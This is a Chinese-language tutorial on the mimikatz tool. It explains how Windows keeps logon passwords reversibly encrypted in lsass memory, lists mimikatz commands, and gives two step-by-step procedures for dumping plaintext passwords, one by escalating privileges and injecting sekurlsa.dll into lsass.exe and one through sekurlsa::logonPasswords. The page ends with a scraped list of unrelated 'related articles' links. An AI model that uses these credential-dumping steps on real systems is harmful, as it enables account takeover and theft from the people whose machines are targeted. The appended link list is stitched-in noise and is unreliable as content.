安装很简单

查看下版本

mimikatz是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点也是让阿刚最感兴趣的就是他可以直接从 lsass中获取当前处于Active系统的登录密码, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而mimikatz正是通过对lsass的逆算获取到明文密码!也就是说只要你不重启电脑,就可以通过他获取到登陆密码,只限当前登陆系统!

这个软件被称为密码抓取神器,mimikatz2.0以后的版本抓取密码很简单,只需要两步:
第一条(提升权限)
privilege::debug

第二条(抓取密码)
sekurlsa::logonpasswords

简单命令

cls-----------------------------清屏
exit----------------------------退出
version------------查看mimikatz的版本
system::user-----查看当前登录的系统用户
system::computer-------查看计算机名称
process::list------------------列出进程
process::suspend 进程名称 -----暂停进程
process::stop 进程名称---------结束进程
process::modules --列出系统的核心模块及所在位置
service::list---------------列出系统的服务
service::remove-----------移除系统的服务
service::start stop 服务名称–启动或停止服务
privilege::list---------------列出权限列表
privilege::enable--------激活一个或多个权限
privilege::debug-----------------提升权限
nogpo::cmd------------打开系统的cmd.exe
nogpo::regedit -----------打开系统的注册表
nogpo::taskmgr-------------打开任务管理器
ts::sessions-----------------显示当前的会话
ts::processes------显示进程和对应的pid情况等
sekurlsa::wdigest-----获取本地用户信息及密码
sekurlsa::tspkg------获取tspkg用户信息及密码
sekurlsa::logonPasswords–获登陆用户信息及密码

1.常规的操作使用命令
mimikatz # cls -->清屏,类似dos命令cls.
mimikatz # exit -->退出mimikatz.
mimikatz #version -->查看当前的mimikatz的版本.
随便输入"xxx::",会提示"modules:‘xxx’ intr0uvable",大概意思就是你输入的命令不存在,然后会列出所有可用的命令
查看列表中命令的具体参数同样可以输入"命令::"来查看
命令inject的具体参数有pid,process,service等……

2.系统方面的操作使用命令:system
mimikatz #system::user -->查看当前登录的系统用户
mimikazt #system::computer -->返回当前的计算机名称

3.在服务器终端的操作命令: ts
mimikatz #ts::sessions -->显示当前的会话
mimikatz #ts::processes windows-d.vm.nirvana.local -->显示服务器的进程和对应的pid情况等。

4.系统服务相关的操作使用命令:service

5.系统进程相关操作的使用命令:process

6.系统线程相关操作使用命令:thread

7.系统句柄相关操作使用命令:handle

8.加密相关操作使用命令:crypto

9.注入操作使用命令:inject

mimikatz获取用户名及密码的方法
方法一:
1.运行主程序:mimikatz.exe
2. 输入:privilege::debug 提升权限
3. 输入:inject::process lsass.exe sekurlsa.dll 将sekurlsa.dll 注入到lsass.exe 中(运行到这一步会出现拒绝访问的提示)
4. 输入:@getLogonPasswords 即可获取hash和当前用户的明文密码!

原理就是登陆的时候输入的密码,经过 lsass.exe 里的wdigest和tspkg两个模块调用后,它们对之进行加密处理,而没有进行擦除
而且该加密通过特征可以定位,并且按照微软的算法可逆。 只要登陆过,就可以抓出来,它进行枚举的。
简单地说,在 Windows 中,当用户登录时,lsass.exe 使用一个可逆的算法,加密过的明文密码,并且把密文保存在内存中,没有清理,然后可以抓出来,还原。
也就是说,开机以后,只要是登陆过的用户,在没重启前(因为重启内存就清零了,这里不包括使用其他方法清理内存),都可以抓出来,注销也是无用的,
因为内存中的密码并没有清除,所以还是可以抓出来的。

方法二(直接调用sekurlsa模块):(经本人测试有效)
1.运行主程序:mimikatz.exe
2. 输入:privilege::debug 提升权限
3.输入:sekurlsa::logonPasswords full

法国大面包 mimikatz使用方法相关推荐

  1. 法国大面包mimikatz使用方法

    该工具可以让我们获取到Windows系统密码的明码 运行软件后,输入两条命令: 第一条:privilege::debug //提升权限 第二条:sekurlsa::logonpasswords //抓 ...

  2. tomcat端口号被占用怎么解决_电脑C盘空间不够用怎么办?Win7解决C盘占用空间大的3个方法!...

    在使用电脑的时候许多人都会出现这样的一个问题:电脑用的时候越长,C盘的可用空间就越来越少,严重的时候可能会导致一些软件无法安装和运行.电脑C盘空间不够用怎么办?今天小雨给大家介绍一下Win7解决C盘占 ...

  3. 应用程序错误电脑黑屏_电脑黑屏了怎么办,电脑硬件win黑屏的6大原因以及解决方法...

    Windows出现黑屏的情况,其实可以说是十分经典的一个电脑问题了,相信有很多朋友都遇到过.而Windows黑屏的情况,除了系统软件导致之外,还有可能是电脑硬件问题导致的,也会比较难解决.而小编也整理 ...

  4. JAVA实现服务器间拷贝文件,寻找在Java服务器之间传输大文件的好方法

    在这个项目中有一个主要的数据库服务器,其他安装在不同地方的服务器维护着自己的本地数据库.我们必须允许每个系统将其本地数据库更新为主要数据库上的任何版本.所有的服务器都运行Java环境.寻找在Java服 ...

  5. vnc远程登录linux黑屏,linux VNC安装好后登录黑屏 鼠标显示黑色大叉的解决方法

    linux VNC安装好以后用VNC登录黑屏,鼠标显示黑色大叉的解决方法 这里的方法选择执行就可以了,我这里是执行了第二句,第三句就可以了,原因是系统在安装的时候没有安装桌面元素包 linux VNC ...

  6. batocera_旧电脑变身影音游戏主机,来自法国大神的batocera系统

    (一)旧电脑变身影音游戏主机,来自法国大神的batocera系统 batocera是法国大神基于LINUX系统开发的一款模拟游戏主机系统.因为基于LINUX所有,它对电脑配置的要求很低.这也使得它非常 ...

  7. 大数据时代 | 数据分析方法及理论详解

    大数据时代 | 数据分析方法及理论详解 1 数据分析前,我们需要思考 像一场战役的总指挥影响着整个战役的胜败一样,数据分析师的思想对于整体分析思路,甚至分析结果都有着关键性的作用. 2 分析问题和解决 ...

  8. 交换机组最常见的8大故障及解决方法

    在交换机组网时常见的故障比较多,为了帮助大家更好地排除这些故障,在此飞畅科技的小编来为大家介绍一些常见的典型故障案例和处理思路供大家参考.接下来大家就一起来看看交换机组最常见的8大故障及解决方法吧. ...

  9. python合并txt文本_Python实现将目录中TXT合并成一个大TXT文件的方法

    本文实例讲述了Python实现将目录中TXT合并成一个大TXT文件的方法.分享给大家供大家参考.具体如下: 在网上下了一个dota的英雄攻略,TXT格式,每个英雄一个文件,看得疼,就写了一个小东西,合 ...

最新文章

  1. jstat命令查看tomcat进程提示进程没找到(PID not found
  2. java focuslistene_Java:FocusListener接口
  3. 5、Linux系统的目录结构
  4. NYOJ 298 点的变换(矩阵快速幂)
  5. 公有云:美酒or毒药?--【软件和信息服务】2014.12
  6. php自动计数,PHP 实现精确统计在线人数功能
  7. docker开放的端口_关于docker自动开放端口解决方案
  8. 今天我不想发文了,对不起各位!
  9. 同程Z世代红色旅游报告:《觉醒年代》带火上海
  10. YUV格式学习:YUV422P、YV16、NV16、NV61格式转换成RGB24
  11. torch.Tensor和torch.tensor有什么区别?
  12. 奇安信代码安全实验室帮助谷歌修复 Chrome 沙箱外高危漏洞,获官方致谢
  13. Halcon深度学习总结
  14. 旅游网站设计制作方案
  15. 23种设计模式——最好理解的代理模式
  16. 2002 计算球体体积
  17. 【刷机】LG G2 能进入recovery但是不能进入新系统,can't open file ,G2刷TOT
  18. 有服务器端源码和客户端源码,C# 远程控制软件源码(含服务器端和客户端源码)...
  19. FPGA VIVADO仿真详解 TEST BENCH
  20. 【C语言】交换函数(swap)

热门文章

  1. 简述单片机c51语言程序结构,单片机C51程序结构
  2. web安全---xxs攻击
  3. LPC2148的系统时钟配置II
  4. ubuntu18.04安装ROS melodic
  5. Codeforces 750D New Year and Fireworks 暴力BFS
  6. python 桌面自动化_桌面自动化:PyAutoGUI
  7. 3D NAND闪存是个啥?让国内如此疯狂
  8. python应用实例论文_python人人网登录应用实例
  9. 解决Xposed提示java.lang.ClassNotFoundException: Didn't find class com.xposeddemo.xposed.XposedInit
  10. python登录人人网